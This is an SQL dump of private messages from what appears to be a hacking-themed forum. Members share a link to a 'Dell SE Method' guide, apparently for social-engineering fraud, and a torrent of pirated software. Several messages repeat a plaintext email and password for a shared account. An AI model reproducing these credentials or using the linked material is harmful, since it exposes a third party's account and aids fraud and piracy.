'1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3186', '222', '222', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'ƒ???????????g\'s Dell SE Method....', '0', 'can i have this?\r\nthanks in advance bro.', '1350321944', '0', '3', '1350324840', '1', '0', '2', '1350324750'); INSERT INTO mybb_privatemessages VALUES('3187', '62', '222', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'ƒ???????????g\'s Dell SE Method....', '0', 'can i have this?\r\nthanks in advance bro.', '1350321944', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3188', '62', '62', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: ƒ???????????g\'s Dell SE Method....', '0', '[quote=\'R?????zo?\']\r\ncan i have this?\r\nthanks in advance bro.\r\n[/quote]\r\n\r\nyep here you go....\r\n\r\nhttp://www.2shared.com/document/BA-L8EKU/JinXersDellSEGuide.html', '1350324840', '0', '1', '0', '1', '0', '2', '1350388878'); INSERT INTO mybb_privatemessages VALUES('3189', '222', '62', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: ƒ???????????g\'s Dell SE Method....', '0', '[quote=\'R?????zo?\']\r\ncan i have this?\r\nthanks in advance bro.\r\n[/quote]\r\n\r\nyep here you go....\r\n\r\nhttp://www.2shared.com/document/BA-L8EKU/JinXersDellSEGuide.html', '1350324840', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3190', '257', '257', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Hey', '0', 'Here is the guide bro....\r\n\r\nhttp://www.2shared.com/document/BA-L8EKU/JinXersDellSEGuide.html', '1350324890', '0', '3', '1350347414', '1', '0', '2', '1350347385'); INSERT INTO mybb_privatemessages VALUES('3191', '222', '257', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Hey', '0', 'Here is the guide bro....\r\n\r\nhttp://www.2shared.com/document/BA-L8EKU/JinXersDellSEGuide.html', '1350324890', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3192', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Monkey', '0', '[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nThanks for keeping an eye out on Monkey and what site was he advertising? Link or name please. \r\n[/quote]\r\nI deleted the post, So I can\'t remeber what it was. But it had ads for anarchy forums all over it\r\n[/quote]\r\n\r\nSo basically it was @narchy?', '1350329164', '0', '3', '1350339663', '1', '0', '0', '1350339635'); INSERT INTO mybb_privatemessages VALUES('3193', '228', '228', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Mod ', '0', 'I\'m making you a mod right now sorry for taking too long.', '1350329203', '0', '1', '0', '1', '0', '0', '1350329977'); INSERT INTO mybb_privatemessages VALUES('3194', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey HELP', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\nhey whats up, i would just like to say LH has been very inactive and was wondering if you want me to promote it.\r\n[/quote]\r\nSure, I would appreciate it. ', '1350329593', '0', '3', '1350346910', '1', '0', '0', '1350346893'); INSERT INTO mybb_privatemessages VALUES('3195', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Hey got a question....', '0', '[quote=\'ƒ???????????g\']\r\nIs it ok if I advertise my monetizing forum on LH? It\'s basically a forum where people can go to check out all the awesome methods of making money and shit. And track their profits on the site and try to get to a large sum of money. It is in no way hacking or anything like that related.? Would that be alright? And I am also looking for staff so if you know anyone :P :P :P :P\r\n[/quote]\r\nSure such forums are allowed. I will let you know if there\'s anyone interested. ', '1350329645', '0', '1', '0', '1', '0', '0', '1350329998'); INSERT INTO mybb_privatemessages VALUES('3196', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Domain Register', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5\r\n[/quote]\r\n\r\nUse retailmenot.com for coupons.\r\n[/quote]\r\nShould I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608\r\n[/quote]\r\n\r\nLast used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work.\r\n[/quote]\r\nWhere is your domain registered at?\r\n[/quote]\r\n\r\nNetfirms. \r\n[/quote]\r\nOkay I might register surpriseforums.com or .net \r\n[/quote]\r\n\r\nI would recommend .net because it\'s more safer.', '1350329687', '0', '3', '1350339665', '1', '0', '0', '1350339625'); INSERT INTO mybb_privatemessages VALUES('3199', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Tnx', '0', 'Thanks i will do my best to get LH to the TOP :D\r\n', '1350330047', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3397', '257', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: that premium account ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nhey here is that premium account please dont change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n\r\n[/quote]\r\n\r\n1. Can you fix your grammar?\r\n2. Account doesn\'t work.\r\n3. Even if it did, I can\'t change the password because I have to have the answers for the security questions.\r\n4. No asking for rep.\r\n5. Rating threads are disabled.\r\n\r\n[/quote]\r\n\r\nanwers to yours\r\n1.ok\r\n2.it does i just logged in and it worked fine\r\n3.just making sure\r\n4. i said rep if i helped you im not telling you to \r\n5. just realized that \r\nand the account does work try again\r\n[/quote]\r\n\r\nDo you know what fixing your grammar and spelling means? :/\r\n\r\n1. You still didn\'t do.\r\n2. No it does not work.\r\n3. Yeah I\'m correct.\r\n4. Still it\'s still considered asking for rep.\r\n5. Okay.', '1350599178', '0', '1', '0', '1', '0', '0', '1350603952'); INSERT INTO mybb_privatemessages VALUES('3201', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey...', '0', 'you should make me staff :P', '1350330167', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3202', '228', '228', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Tnx', '0', '[quote=\'VirtualLegend\']\r\nThanks i will do my best to get LH to the TOP :D\r\n\r\n[/quote]\r\n\r\nNo thank you actually for helping me keep LH safe/clean and making it an active website.\r\n\r\nCheck out the Mod section and take a look at the stickies for more information. ', '1350330215', '0', '1', '0', '1', '0', '0', '1350330588'); INSERT INTO mybb_privatemessages VALUES('3203', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Hey...', '0', '[quote=\'ƒ???????????g\']\r\nyou should make me staff :P\r\n[/quote]\r\n\r\nSorry but no. I made Virtual a Mod because we made a deal and new Mods/Staff are picked at Admins discretion. I can\'t pick a new admin, I have to discuss it with NXK or Apathy.\r\n\r\n\r\nhttp://l33thacking.net/misc.php?action=help&hid=17', '1350330337', '0', '1', '0', '1', '0', '0', '1350330407'); INSERT INTO mybb_privatemessages VALUES('3395', '222', '222', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Custom Pastebin Source Code', '0', 'Here you go, enjoy\r\nhttp://www.mediafire.com/download.php?bhiaiyz3op0d2go', '1350598707', '0', '1', '0', '1', '0', '2', '1350600919'); INSERT INTO mybb_privatemessages VALUES('3396', '3', '222', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Custom Pastebin Source Code', '0', 'Here you go, enjoy\r\nhttp://www.mediafire.com/download.php?bhiaiyz3op0d2go', '1350598707', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3205', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Monkey', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nThanks for keeping an eye out on Monkey and what site was he advertising? Link or name please. \r\n[/quote]\r\nI deleted the post, So I can\'t remeber what it was. But it had ads for anarchy forums all over it\r\n[/quote]\r\n\r\nSo basically it was @narchy?\r\n[/quote]\r\n\r\nPretty much.', '1350339663', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3393', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: that premium account ', '0', '[quote=\'iTzIpod\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nhey here is that premium account please dont change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n\r\n[/quote]\r\n\r\n1. Can you fix your grammar?\r\n2. Account doesn\'t work.\r\n3. Even if it did, I can\'t change the password because I have to have the answers for the security questions.\r\n4. No asking for rep.\r\n5. Rating threads are disabled.\r\n\r\n[/quote]\r\n\r\nanwers to yours\r\n1.ok\r\n2.it does i just logged in and it worked fine\r\n3.just making sure\r\n4. i said rep if i helped you im not telling you to \r\n5. just realized that \r\nand the account does work try again', '1350595563', '0', '3', '1350599178', '1', '0', '2', '1350599067'); INSERT INTO mybb_privatemessages VALUES('3394', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: that premium account ', '0', '[quote=\'iTzIpod\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nhey here is that premium account please dont change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n\r\n[/quote]\r\n\r\n1. Can you fix your grammar?\r\n2. Account doesn\'t work.\r\n3. Even if it did, I can\'t change the password because I have to have the answers for the security questions.\r\n4. No asking for rep.\r\n5. Rating threads are disabled.\r\n\r\n[/quote]\r\n\r\nanwers to yours\r\n1.ok\r\n2.it does i just logged in and it worked fine\r\n3.just making sure\r\n4. i said rep if i helped you im not telling you to \r\n5. just realized that \r\nand the account does work try again', '1350595563', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3207', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5\r\n[/quote]\r\n\r\nUse retailmenot.com for coupons.\r\n[/quote]\r\nShould I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608\r\n[/quote]\r\n\r\nLast used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work.\r\n[/quote]\r\nWhere is your domain registered at?\r\n[/quote]\r\n\r\nNetfirms. \r\n[/quote]\r\nOkay I might register surpriseforums.com or .net \r\n[/quote]\r\n\r\nI would recommend .net because it\'s more safer.\r\n[/quote]\r\nOkay, I will go with .net\r\nCould you send me $3 please?', '1350339665', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3208', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Monkey', '0', '[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nThanks for keeping an eye out on Monkey and what site was he advertising? Link or name please. \r\n[/quote]\r\nI deleted the post, So I can\'t remeber what it was. But it had ads for anarchy forums all over it\r\n[/quote]\r\n\r\nSo basically it was @narchy?\r\n[/quote]\r\n\r\nPretty much.\r\n[/quote]\r\n\r\nAlright thanks.', '1350341329', '0', '1', '0', '1', '0', '0', '1350341447'); INSERT INTO mybb_privatemessages VALUES('3209', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Domain Register', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5\r\n[/quote]\r\n\r\nUse retailmenot.com for coupons.\r\n[/quote]\r\nShould I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608\r\n[/quote]\r\n\r\nLast used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work.\r\n[/quote]\r\nWhere is your domain registered at?\r\n[/quote]\r\n\r\nNetfirms. \r\n[/quote]\r\nOkay I might register surpriseforums.com or .net \r\n[/quote]\r\n\r\nI would recommend .net because it\'s more safer.\r\n[/quote]\r\nOkay, I will go with .net\r\nCould you send me $3 please?\r\n[/quote]\r\n\r\nJust wait a couple of days because then I\'ll get some money from adf.ly, I don\'t have money because I use my dads card and he is in another country so it\'s expensive to convert into dollars so I use other sources to earn.', '1350341432', '0', '3', '1350343407', '1', '0', '0', '1350343386'); INSERT INTO mybb_privatemessages VALUES('3389', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'that premium account ', '0', 'hey here is that premium account please dont change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n', '1350594781', '0', '3', '1350595041', '1', '0', '2', '1350594930'); INSERT INTO mybb_privatemessages VALUES('3390', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'that premium account ', '0', 'hey here is that premium account please dont change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n', '1350594781', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3391', '257', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: that premium account ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\nhey here is that premium account please dont change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n\r\n[/quote]\r\n\r\n1. Can you fix your grammar?\r\n2. Account doesn\'t work.\r\n3. Even if it did, I can\'t change the password because I have to have the answers for the security questions.\r\n4. No asking for rep.\r\n5. Rating threads are disabled.\r\n', '1350595041', '0', '3', '1350595563', '1', '0', '0', '1350595349'); INSERT INTO mybb_privatemessages VALUES('3392', '82', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: that premium account ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\nhey here is that premium account please dont change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n\r\n[/quote]\r\n\r\n1. Can you fix your grammar?\r\n2. Account doesn\'t work.\r\n3. Even if it did, I can\'t change the password because I have to have the answers for the security questions.\r\n4. No asking for rep.\r\n5. Rating threads are disabled.\r\n', '1350595041', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3211', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5\r\n[/quote]\r\n\r\nUse retailmenot.com for coupons.\r\n[/quote]\r\nShould I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608\r\n[/quote]\r\n\r\nLast used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work.\r\n[/quote]\r\nWhere is your domain registered at?\r\n[/quote]\r\n\r\nNetfirms. \r\n[/quote]\r\nOkay I might register surpriseforums.com or .net \r\n[/quote]\r\n\r\nI would recommend .net because it\'s more safer.\r\n[/quote]\r\nOkay, I will go with .net\r\nCould you send me $3 please?\r\n[/quote]\r\n\r\nJust wait a couple of days because then I\'ll get some money from adf.ly, I don\'t have money because I use my dads card and he is in another country so it\'s expensive to convert into dollars so I use other sources to earn.\r\n[/quote]\r\nOh okay', '1350343407', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3820', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '1', 'Re: rewards', '0', '[quote=\'HoverCatz\']\r\nhi. All awards reset? even donated to a mod for one D:\r\n[/quote]\r\n\r\nYes all have been reset. I remember your donation award, I will think of something. Also, I\'m sure you had more awards do you remember what they were?', '1351213874', '0', '3', '1351253718', '1', '0', '0', '1351253487'); INSERT INTO mybb_privatemessages VALUES('3213', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hey HELP', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nhey whats up, i would just like to say LH has been very inactive and was wondering if you want me to promote it.\r\n[/quote]\r\nSure, I would appreciate it. \r\n[/quote]\r\nstarted:)', '1350346910', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3214', '205', '205', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '1', 'Re: Check out the gamers section', '0', '[quote=\'mothered\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nhey man whats up come look at some of my post at the gaming section, the gaming sectin is kinda inactive ATM there about 5 of us that are active in the gamers section.thanks \r\n[/quote]\r\n\r\nHey mate,\r\n\r\nI shall check It out. I\'m not a Gamer, but will try to relate to what\'s there.\r\n\r\nCheers.\r\n[/quote]\r\nthsnks ', '1350347056', '0', '1', '0', '1', '0', '2', '1350387113'); INSERT INTO mybb_privatemessages VALUES('3215', '257', '205', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '2', 'Re: Check out the gamers section', '0', '[quote=\'mothered\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nhey man whats up come look at some of my post at the gaming section, the gaming sectin is kinda inactive ATM there about 5 of us that are active in the gamers section.thanks \r\n[/quote]\r\n\r\nHey mate,\r\n\r\nI shall check It out. I\'m not a Gamer, but will try to relate to what\'s there.\r\n\r\nCheers.\r\n[/quote]\r\nthsnks ', '1350347056', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3216', '222', '222', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Hey', '0', '[quote=\'ƒ???????????g\']\r\nHere is the guide bro....\r\n\r\nhttp://www.2shared.com/document/BA-L8EKU/JinXersDellSEGuide.html\r\n[/quote]\r\nthanks man', '1350347414', '0', '1', '0', '1', '0', '2', '1350352812'); INSERT INTO mybb_privatemessages VALUES('3217', '257', '222', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: Hey', '0', '[quote=\'ƒ???????????g\']\r\nHere is the guide bro....\r\n\r\nhttp://www.2shared.com/document/BA-L8EKU/JinXersDellSEGuide.html\r\n[/quote]\r\nthanks man', '1350347414', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3218', '228', '228', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Wow', '0', 'Hey just wondering- how did you get mod so quickly..?', '1350349375', '0', '1', '0', '1', '0', '0', '1350349662'); INSERT INTO mybb_privatemessages VALUES('3219', '100', '228', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Wow', '0', 'Hey just wondering- how did you get mod so quickly..?', '1350349375', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3220', '100', '100', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Google Sniper 2.0', '0', 'Hey,\r\n\r\nSorry but i can\'t upload it with dropbox, so thats why it\'s a torrent. :D\r\n\r\n\r\nLink: http://tpb.anonhi.de/torrent/6555567/Google_Sniper_2.0\r\n\r\nEnjoy your Google Sniper 2.0', '1350349659', '0', '1', '0', '1', '0', '2', '1350349668'); INSERT INTO mybb_privatemessages VALUES('3221', '228', '100', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Google Sniper 2.0', '0', 'Hey,\r\n\r\nSorry but i can\'t upload it with dropbox, so thats why it\'s a torrent. :D\r\n\r\n\r\nLink: http://tpb.anonhi.de/torrent/6555567/Google_Sniper_2.0\r\n\r\nEnjoy your Google Sniper 2.0', '1350349659', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3222', '100', '100', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Mod', '0', 'Ask it to the big boss :P\r\n\r\n', '1350349729', '0', '1', '0', '1', '0', '2', '1350349772'); INSERT INTO mybb_privatemessages VALUES('3223', '228', '100', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Mod', '0', 'Ask it to the big boss :P\r\n\r\n', '1350349729', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3231', '199', '199', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '1', 'Sup', '0', 'Sup man you have been inactive for a couple of days, what\'s wrong? ', '1350360044', '0', '1', '0', '1', '0', '0', '1350461960'); INSERT INTO mybb_privatemessages VALUES('3232', '53', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Google Sniper 2.0', '0', 'Download Link: http://tpb.anonhi.de/torrent/6555567/Google_Sniper_2.0\r\n\r\nIt\'s a torrent file!', '1350386957', '0', '1', '0', '1', '0', '2', 